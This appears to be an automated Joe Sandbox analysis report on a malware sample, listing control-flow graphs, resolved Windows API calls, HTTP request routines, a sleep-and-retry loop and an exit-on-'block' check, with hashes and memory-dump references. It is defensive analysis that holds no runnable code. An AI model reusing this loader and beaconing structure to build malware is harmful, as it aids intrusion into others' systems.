                          • Opcode ID: 7b61b993aec84deb7edc64fb9848e7596e72807f94ebbdd38f4ff94bd798be35
                          • Instruction ID: 45ceba009475e3cac95737ce5d2e1788a373041d86c8954b2c0f17176e40918e
                          • Opcode Fuzzy Hash: 7b61b993aec84deb7edc64fb9848e7596e72807f94ebbdd38f4ff94bd798be35
                          • Instruction Fuzzy Hash: 38F04FF1D44248AFC704DF99DD49FAEBBB8FB44761F10026AFA09A3680C7B41904CBA1
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitInfoProcessSystem
                          • String ID:
                          • API String ID: 752954902-0
                          • Opcode ID: 76e0d2f270ad53339f80ca73adf97992c94aaa514e030ed4986ab0ac3d90a3ff
                          • Instruction ID: 0568bc06888186d303eef67a13ea92dba0cf201a900fc9330f2b04917a94b522
                          • Opcode Fuzzy Hash: 76e0d2f270ad53339f80ca73adf97992c94aaa514e030ed4986ab0ac3d90a3ff
                          • Instruction Fuzzy Hash: 77D05EB490030CDFCB00EFE1D849AEDBB78FB48312F440565DD0972380EA306486CAA6

                          Control-flow Graph

                          control_flow_graph 633 cc9c10-cc9c1a 634 cca036-cca0ca LoadLibraryA * 8 633->634 635 cc9c20-cca031 GetProcAddress * 43 633->635 636 cca0cc-cca141 GetProcAddress * 5 634->636 637 cca146-cca14d 634->637 635->634 636->637 638 cca216-cca21d 637->638 639 cca153-cca211 GetProcAddress * 8 637->639 640 cca21f-cca293 GetProcAddress * 5 638->640 641 cca298-cca29f 638->641 639->638 640->641 642 cca2a5-cca332 GetProcAddress * 6 641->642 643 cca337-cca33e 641->643 642->643 644 cca41f-cca426 643->644 645 cca344-cca41a GetProcAddress * 9 643->645 646 cca428-cca49d GetProcAddress * 5 644->646 647 cca4a2-cca4a9 644->647 645->644 646->647 648 cca4dc-cca4e3 647->648 649 cca4ab-cca4d7 GetProcAddress * 2 647->649 650 cca515-cca51c 648->650 651 cca4e5-cca510 GetProcAddress * 2 648->651 649->648 652 cca612-cca619 650->652 653 cca522-cca60d GetProcAddress * 10 650->653 651->650 654 cca67d-cca684 652->654 655 cca61b-cca678 GetProcAddress * 4 652->655 653->652 656 cca69e-cca6a5 654->656 657 cca686-cca699 GetProcAddress 654->657 655->654 658 cca708-cca709 656->658 659 cca6a7-cca703 GetProcAddress * 4 656->659 657->656 659->658
                          APIs
                          • GetProcAddress.KERNEL32(74DD0000,01885530), ref: 00CC9C2D
                          • GetProcAddress.KERNEL32(74DD0000,01885550), ref: 00CC9C45
                          • GetProcAddress.KERNEL32(74DD0000,0189A128), ref: 00CC9C5E
                          • GetProcAddress.KERNEL32(74DD0000,0189A0E0), ref: 00CC9C76
                          • GetProcAddress.KERNEL32(74DD0000,0189A140), ref: 00CC9C8E
                          • GetProcAddress.KERNEL32(74DD0000,0189A158), ref: 00CC9CA7
                          • GetProcAddress.KERNEL32(74DD0000,0188B770), ref: 00CC9CBF
                          • GetProcAddress.KERNEL32(74DD0000,0189D0C8), ref: 00CC9CD7
                          • GetProcAddress.KERNEL32(74DD0000,0189D1E8), ref: 00CC9CF0
                          • GetProcAddress.KERNEL32(74DD0000,0189D230), ref: 00CC9D08
                          • GetProcAddress.KERNEL32(74DD0000,0189D0E0), ref: 00CC9D20
                          • GetProcAddress.KERNEL32(74DD0000,01885350), ref: 00CC9D39
                          • GetProcAddress.KERNEL32(74DD0000,01885570), ref: 00CC9D51
                          • GetProcAddress.KERNEL32(74DD0000,01885590), ref: 00CC9D69
                          • GetProcAddress.KERNEL32(74DD0000,018855F0), ref: 00CC9D82
                          • GetProcAddress.KERNEL32(74DD0000,0189D200), ref: 00CC9D9A
                          • GetProcAddress.KERNEL32(74DD0000,0189D1D0), ref: 00CC9DB2
                          • GetProcAddress.KERNEL32(74DD0000,0188B4F0), ref: 00CC9DCB
                          • GetProcAddress.KERNEL32(74DD0000,01885370), ref: 00CC9DE3
                          • GetProcAddress.KERNEL32(74DD0000,0189D008), ref: 00CC9DFB
                          • GetProcAddress.KERNEL32(74DD0000,0189D248), ref: 00CC9E14
                          • GetProcAddress.KERNEL32(74DD0000,0189D260), ref: 00CC9E2C
                          • GetProcAddress.KERNEL32(74DD0000,0189D020), ref: 00CC9E44
                          • GetProcAddress.KERNEL32(74DD0000,01885670), ref: 00CC9E5D
                          • GetProcAddress.KERNEL32(74DD0000,0189D2A8), ref: 00CC9E75
                          • GetProcAddress.KERNEL32(74DD0000,0189D140), ref: 00CC9E8D
                          • GetProcAddress.KERNEL32(74DD0000,0189D0F8), ref: 00CC9EA6
                          • GetProcAddress.KERNEL32(74DD0000,0189D218), ref: 00CC9EBE
                          • GetProcAddress.KERNEL32(74DD0000,0189D278), ref: 00CC9ED6
                          • GetProcAddress.KERNEL32(74DD0000,0189CFC0), ref: 00CC9EEF
                          • GetProcAddress.KERNEL32(74DD0000,0189D038), ref: 00CC9F07
                          • GetProcAddress.KERNEL32(74DD0000,0189D110), ref: 00CC9F1F
                          • GetProcAddress.KERNEL32(74DD0000,0189D050), ref: 00CC9F38
                          • GetProcAddress.KERNEL32(74DD0000,01899388), ref: 00CC9F50
                          • GetProcAddress.KERNEL32(74DD0000,0189CFD8), ref: 00CC9F68
                          • GetProcAddress.KERNEL32(74DD0000,0189D1B8), ref: 00CC9F81
                          • GetProcAddress.KERNEL32(74DD0000,01885610), ref: 00CC9F99
                          • GetProcAddress.KERNEL32(74DD0000,0189D128), ref: 00CC9FB1
                          • GetProcAddress.KERNEL32(74DD0000,01885630), ref: 00CC9FCA
                          • GetProcAddress.KERNEL32(74DD0000,0189CFF0), ref: 00CC9FE2
                          • GetProcAddress.KERNEL32(74DD0000,0189D068), ref: 00CC9FFA
                          • GetProcAddress.KERNEL32(74DD0000,01885650), ref: 00CCA013
                          • GetProcAddress.KERNEL32(74DD0000,018856D0), ref: 00CCA02B
                          • LoadLibraryA.KERNEL32(0189D290,?,00CC5CA3,00CD0AEB,?,?,?,?,?,?,?,?,?,?,00CD0AEA,00CD0AE3), ref: 00CCA03D
                          • LoadLibraryA.KERNEL32(0189D170,?,00CC5CA3,00CD0AEB,?,?,?,?,?,?,?,?,?,?,00CD0AEA,00CD0AE3), ref: 00CCA04E
                          • LoadLibraryA.KERNEL32(0189D188,?,00CC5CA3,00CD0AEB,?,?,?,?,?,?,?,?,?,?,00CD0AEA,00CD0AE3), ref: 00CCA060
                          • LoadLibraryA.KERNEL32(0189D080,?,00CC5CA3,00CD0AEB,?,?,?,?,?,?,?,?,?,?,00CD0AEA,00CD0AE3), ref: 00CCA072
                          • LoadLibraryA.KERNEL32(0189D098,?,00CC5CA3,00CD0AEB,?,?,?,?,?,?,?,?,?,?,00CD0AEA,00CD0AE3), ref: 00CCA083
                          • LoadLibraryA.KERNEL32(0189D158,?,00CC5CA3,00CD0AEB,?,?,?,?,?,?,?,?,?,?,00CD0AEA,00CD0AE3), ref: 00CCA095
                          • LoadLibraryA.KERNEL32(0189D0B0,?,00CC5CA3,00CD0AEB,?,?,?,?,?,?,?,?,?,?,00CD0AEA,00CD0AE3), ref: 00CCA0A7
                          • LoadLibraryA.KERNEL32(0189D1A0,?,00CC5CA3,00CD0AEB,?,?,?,?,?,?,?,?,?,?,00CD0AEA,00CD0AE3), ref: 00CCA0B8
                          • GetProcAddress.KERNEL32(75290000,018859B0), ref: 00CCA0DA
                          • GetProcAddress.KERNEL32(75290000,0189D398), ref: 00CCA0F2
                          • GetProcAddress.KERNEL32(75290000,01899B70), ref: 00CCA10A
                          • GetProcAddress.KERNEL32(75290000,0189D320), ref: 00CCA123
                          • GetProcAddress.KERNEL32(75290000,01885770), ref: 00CCA13B
                          • GetProcAddress.KERNEL32(734C0000,0188B608), ref: 00CCA160
                          • GetProcAddress.KERNEL32(734C0000,01885710), ref: 00CCA179
                          • GetProcAddress.KERNEL32(734C0000,0188B630), ref: 00CCA191
                          • GetProcAddress.KERNEL32(734C0000,0189D368), ref: 00CCA1A9
                          • GetProcAddress.KERNEL32(734C0000,0189D338), ref: 00CCA1C2
                          • GetProcAddress.KERNEL32(734C0000,01885A10), ref: 00CCA1DA
                          • GetProcAddress.KERNEL32(734C0000,018857F0), ref: 00CCA1F2
                          • GetProcAddress.KERNEL32(734C0000,0189D350), ref: 00CCA20B
                          • GetProcAddress.KERNEL32(752C0000,01885950), ref: 00CCA22C
                          • GetProcAddress.KERNEL32(752C0000,01885830), ref: 00CCA244
                          • GetProcAddress.KERNEL32(752C0000,0189D380), ref: 00CCA25D
                          • GetProcAddress.KERNEL32(752C0000,0189D3B0), ref: 00CCA275
                          • GetProcAddress.KERNEL32(752C0000,018858F0), ref: 00CCA28D
                          • GetProcAddress.KERNEL32(74EC0000,0188B798), ref: 00CCA2B3
                          • GetProcAddress.KERNEL32(74EC0000,0188B658), ref: 00CCA2CB
                          • GetProcAddress.KERNEL32(74EC0000,0189D2F0), ref: 00CCA2E3
                          • GetProcAddress.KERNEL32(74EC0000,01885790), ref: 00CCA2FC
                          • GetProcAddress.KERNEL32(74EC0000,018857B0), ref: 00CCA314
                          • GetProcAddress.KERNEL32(74EC0000,0188B6A8), ref: 00CCA32C
                          • GetProcAddress.KERNEL32(75BD0000,0189D308), ref: 00CCA352
                          • GetProcAddress.KERNEL32(75BD0000,01885970), ref: 00CCA36A
                          • GetProcAddress.KERNEL32(75BD0000,01899B50), ref: 00CCA382
                          • GetProcAddress.KERNEL32(75BD0000,0189D3E0), ref: 00CCA39B
                          • GetProcAddress.KERNEL32(75BD0000,0189D3C8), ref: 00CCA3B3
                          • GetProcAddress.KERNEL32(75BD0000,01885A30), ref: 00CCA3CB
                          • GetProcAddress.KERNEL32(75BD0000,01885990), ref: 00CCA3E4
                          • GetProcAddress.KERNEL32(75BD0000,0189D3F8), ref: 00CCA3FC
                          • GetProcAddress.KERNEL32(75BD0000,0189D410), ref: 00CCA414
                          • GetProcAddress.KERNEL32(75A70000,018856B0), ref: 00CCA436
                          • GetProcAddress.KERNEL32(75A70000,0189D440), ref: 00CCA44E
                          • GetProcAddress.KERNEL32(75A70000,0189D428), ref: 00CCA466
                          • GetProcAddress.KERNEL32(75A70000,0189D458), ref: 00CCA47F
                          • GetProcAddress.KERNEL32(75A70000,0189D470), ref: 00CCA497
                          • GetProcAddress.KERNEL32(75450000,01885810), ref: 00CCA4B8
                          • GetProcAddress.KERNEL32(75450000,018857D0), ref: 00CCA4D1
                          • GetProcAddress.KERNEL32(75DA0000,01885A50), ref: 00CCA4F2
                          • GetProcAddress.KERNEL32(75DA0000,0189D2C0), ref: 00CCA50A
                          • GetProcAddress.KERNEL32(6F070000,01885850), ref: 00CCA530
                          • GetProcAddress.KERNEL32(6F070000,018856F0), ref: 00CCA548
                          • GetProcAddress.KERNEL32(6F070000,018858B0), ref: 00CCA560
                          • GetProcAddress.KERNEL32(6F070000,0189D2D8), ref: 00CCA579
                          • GetProcAddress.KERNEL32(6F070000,018859D0), ref: 00CCA591
                          • GetProcAddress.KERNEL32(6F070000,01885910), ref: 00CCA5A9
                          • GetProcAddress.KERNEL32(6F070000,01885730), ref: 00CCA5C2
                          • GetProcAddress.KERNEL32(6F070000,01885750), ref: 00CCA5DA
                          • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00CCA5F1
                          • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00CCA607
                          • GetProcAddress.KERNEL32(75AF0000,0189CD98), ref: 00CCA629
                          • GetProcAddress.KERNEL32(75AF0000,01899AF0), ref: 00CCA641
                          • GetProcAddress.KERNEL32(75AF0000,0189CF18), ref: 00CCA659
                          • GetProcAddress.KERNEL32(75AF0000,0189CDF8), ref: 00CCA672
                          • GetProcAddress.KERNEL32(75D90000,01885870), ref: 00CCA693
                          • GetProcAddress.KERNEL32(6CFB0000,0189CE28), ref: 00CCA6B4
                          • GetProcAddress.KERNEL32(6CFB0000,01885890), ref: 00CCA6CD
                          • GetProcAddress.KERNEL32(6CFB0000,0189CCC0), ref: 00CCA6E5
                          • GetProcAddress.KERNEL32(6CFB0000,0189CE88), ref: 00CCA6FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: HttpQueryInfoA$InternetSetOptionA
                          • API String ID: 2238633743-1775429166
                          • Opcode ID: 8bef7b9cf247ecd4bcad2c2054ec8c45a4d78fb398fdc418c38bad66ce30e3f5
                          • Instruction ID: 1cafc78502f8f0061d468cd7b666a3e98d42a4fb10e2cdf2105a5e27944a7480
                          • Opcode Fuzzy Hash: 8bef7b9cf247ecd4bcad2c2054ec8c45a4d78fb398fdc418c38bad66ce30e3f5
                          • Instruction Fuzzy Hash: 14624DF55002419FC348EFABED88D7637F9E7CC24170C857AA60DEB2A4D679A449CB12

                          Control-flow Graph

                          control_flow_graph 1033 cb6280-cb630b call cca7a0 call cb47b0 call cca740 InternetOpenA StrCmpCA 1040 cb630d 1033->1040 1041 cb6314-cb6318 1033->1041 1040->1041 1042 cb6509-cb6525 call cca7a0 call cca800 * 2 1041->1042 1043 cb631e-cb6342 InternetConnectA 1041->1043 1062 cb6528-cb652d 1042->1062 1045 cb6348-cb634c 1043->1045 1046 cb64ff-cb6503 InternetCloseHandle 1043->1046 1047 cb635a 1045->1047 1048 cb634e-cb6358 1045->1048 1046->1042 1050 cb6364-cb6392 HttpOpenRequestA 1047->1050 1048->1050 1052 cb6398-cb639c 1050->1052 1053 cb64f5-cb64f9 InternetCloseHandle 1050->1053 1055 cb639e-cb63bf InternetSetOptionA 1052->1055 1056 cb63c5-cb6405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1046 1055->1056 1058 cb642c-cb644b call cc8940 1056->1058 1059 cb6407-cb6427 call cca740 call cca800 * 2 1056->1059 1066 cb64c9-cb64e9 call cca740 call cca800 * 2 1058->1066 1067 cb644d-cb6454 1058->1067 1059->1062 1066->1062 1069 cb64c7-cb64ef InternetCloseHandle 1067->1069 1070 cb6456-cb6480 InternetReadFile 1067->1070 1069->1053 1073 cb648b 1070->1073 1074 cb6482-cb6489 1070->1074 1073->1069 1074->1073 1078 cb648d-cb64c5 call cca9b0 call cca8a0 call cca800 1074->1078 1078->1070
                          APIs
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                            • Part of subcall function 00CB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00CB4839
                            • Part of subcall function 00CB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00CB4849
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                          • InternetOpenA.WININET(00CD0DFE,00000001,00000000,00000000,00000000), ref: 00CB62E1
                          • StrCmpCA.SHLWAPI(?,0189E6F8), ref: 00CB6303
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CB6335
                          • HttpOpenRequestA.WININET(00000000,GET,?,0189DEC8,00000000,00000000,00400100,00000000), ref: 00CB6385
                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00CB63BF
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CB63D1
                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00CB63FD
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00CB646D
                          • InternetCloseHandle.WININET(00000000), ref: 00CB64EF
                          • InternetCloseHandle.WININET(00000000), ref: 00CB64F9
                          • InternetCloseHandle.WININET(00000000), ref: 00CB6503
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                          • String ID: ERROR$ERROR$GET
                          • API String ID: 3749127164-2509457195
                          • Opcode ID: 96655a8dea1ccd763298a88fa20c6d6ed9c4569e47099239f858a850eff807ac
                          • Instruction ID: fc600a0cd2f59b83bbc37350c6bf2a5b7421b2da7e985e27795b9ce70849cb61
                          • Opcode Fuzzy Hash: 96655a8dea1ccd763298a88fa20c6d6ed9c4569e47099239f858a850eff807ac
                          • Instruction Fuzzy Hash: 75711D71A00218AFDB24DFA1DC49FEE77B8BB44704F1081A9F50A6B1D0DBB46A89DF51

                          Control-flow Graph

                          control_flow_graph 1090 cc5510-cc5577 call cc5ad0 call cca820 * 3 call cca740 * 4 1106 cc557c-cc5583 1090->1106 1107 cc5585-cc55b6 call cca820 call cca7a0 call cb1590 call cc51f0 1106->1107 1108 cc55d7-cc564c call cca740 * 2 call cb1590 call cc52c0 call cca8a0 call cca800 call ccaad0 StrCmpCA 1106->1108 1124 cc55bb-cc55d2 call cca8a0 call cca800 1107->1124 1134 cc5693-cc56a9 call ccaad0 StrCmpCA 1108->1134 1138 cc564e-cc568e call cca7a0 call cb1590 call cc51f0 call cca8a0 call cca800 1108->1138 1124->1134 1139 cc57dc-cc5844 call cca8a0 call cca820 * 2 call cb1670 call cca800 * 4 call cc6560 call cb1550 1134->1139 1140 cc56af-cc56b6 1134->1140 1138->1134 1270 cc5ac3-cc5ac6 1139->1270 1143 cc56bc-cc56c3 1140->1143 1144 cc57da-cc585f call ccaad0 StrCmpCA 1140->1144 1149 cc571e-cc5793 call cca740 * 2 call cb1590 call cc52c0 call cca8a0 call cca800 call ccaad0 StrCmpCA 1143->1149 1150 cc56c5-cc5719 call cca820 call cca7a0 call cb1590 call cc51f0 call cca8a0 call cca800 1143->1150 1163 cc5865-cc586c 1144->1163 1164 cc5991-cc59f9 call cca8a0 call cca820 * 2 call cb1670 call cca800 * 4 call cc6560 call cb1550 1144->1164 1149->1144 1250 cc5795-cc57d5 call cca7a0 call cb1590 call cc51f0 call cca8a0 call cca800 1149->1250 1150->1144 1171 cc598f-cc5a14 call ccaad0 StrCmpCA 1163->1171 1172 cc5872-cc5879 1163->1172 1164->1270 1201 cc5a28-cc5a91 call cca8a0 call cca820 * 2 call cb1670 call cca800 * 4 call cc6560 call cb1550 1171->1201 1202 cc5a16-cc5a21 Sleep 1171->1202 1179 cc587b-cc58ce call cca820 call cca7a0 call cb1590 call cc51f0 call cca8a0 call cca800 1172->1179 1180 cc58d3-cc5948 call cca740 * 2 call cb1590 call cc52c0 call cca8a0 call cca800 call ccaad0 StrCmpCA 1172->1180 1179->1171 1180->1171 1275 cc594a-cc598a call cca7a0 call cb1590 call cc51f0 call cca8a0 call cca800 1180->1275 1201->1270 1202->1106 1250->1144 1275->1171
                          APIs
                            • Part of subcall function 00CCA820: lstrlen.KERNEL32(00CB4F05,?,?,00CB4F05,00CD0DDE), ref: 00CCA82B
                            • Part of subcall function 00CCA820: lstrcpy.KERNEL32(00CD0DDE,00000000), ref: 00CCA885
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CC5644
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CC56A1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CC5857
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                            • Part of subcall function 00CC51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CC5228
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                            • Part of subcall function 00CC52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CC5318
                            • Part of subcall function 00CC52C0: lstrlen.KERNEL32(00000000), ref: 00CC532F
                            • Part of subcall function 00CC52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00CC5364
                            • Part of subcall function 00CC52C0: lstrlen.KERNEL32(00000000), ref: 00CC5383
                            • Part of subcall function 00CC52C0: lstrlen.KERNEL32(00000000), ref: 00CC53AE
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CC578B
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CC5940
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CC5A0C
                          • Sleep.KERNEL32(0000EA60), ref: 00CC5A1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen$Sleep
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 507064821-2791005934
                          • Opcode ID: 83c3ebe502238b1f1e7e0c03d6e7c9b963e2dcf86bae250119611e04b986b831
                          • Instruction ID: 20d577a23a9fbe537992d34940543dd899ec6389edd7b2ed007479c19d04592b
                          • Opcode Fuzzy Hash: 83c3ebe502238b1f1e7e0c03d6e7c9b963e2dcf86bae250119611e04b986b831
                          • Instruction Fuzzy Hash: E8E11D71910108ABCB14FBA1DC9AFFD7378AB94304F54816CF50666191EF346E4EEBA2

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1301 cc17a0-cc17cd call ccaad0 StrCmpCA 1304 cc17cf-cc17d1 ExitProcess 1301->1304 1305 cc17d7-cc17f1 call ccaad0 1301->1305 1309 cc17f4-cc17f8 1305->1309 1310 cc17fe-cc1811 1309->1310 1311 cc19c2-cc19cd call cca800 1309->1311 1313 cc199e-cc19bd 1310->1313 1314 cc1817-cc181a 1310->1314 1313->1309 1316 cc18ad-cc18be StrCmpCA 1314->1316 1317 cc18cf-cc18e0 StrCmpCA 1314->1317 1318 cc198f-cc1999 call cca820 1314->1318 1319 cc1849-cc1858 call cca820 1314->1319 1320 cc1821-cc1830 call cca820 1314->1320 1321 cc185d-cc186e StrCmpCA 1314->1321 1322 cc187f-cc1890 StrCmpCA 1314->1322 1323 cc1835-cc1844 call cca820 1314->1323 1324 cc1970-cc1981 StrCmpCA 1314->1324 1325 cc18f1-cc1902 StrCmpCA 1314->1325 1326 cc1951-cc1962 StrCmpCA 1314->1326 1327 cc1932-cc1943 StrCmpCA 1314->1327 1328 cc1913-cc1924 StrCmpCA 1314->1328 1339 cc18ca 1316->1339 1340 cc18c0-cc18c3 1316->1340 1341 cc18ec 1317->1341 1342 cc18e2-cc18e5 1317->1342 1318->1313 1319->1313 1320->1313 1335 cc187a 1321->1335 1336 cc1870-cc1873 1321->1336 1337 cc189e-cc18a1 1322->1337 1338 cc1892-cc189c 1322->1338 1323->1313 1329 cc198d 1324->1329 1330 cc1983-cc1986 1324->1330 1343 cc190e 1325->1343 1344 cc1904-cc1907 1325->1344 1349 cc196e 1326->1349 1350 cc1964-cc1967 1326->1350 1347 cc194f 1327->1347 1348 cc1945-cc1948 1327->1348 1345 cc1926-cc1929 1328->1345 1346 cc1930 1328->1346 1329->1313 1330->1329 1335->1313 1336->1335 1355 cc18a8 1337->1355 1338->1355 1339->1313 1340->1339 1341->1313 1342->1341 1343->1313 1344->1343 1345->1346 1346->1313 1347->1313 1348->1347 1349->1313 1350->1349 1355->1313
                          APIs
                          • StrCmpCA.SHLWAPI(00000000,block), ref: 00CC17C5
                          • ExitProcess.KERNEL32 ref: 00CC17D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
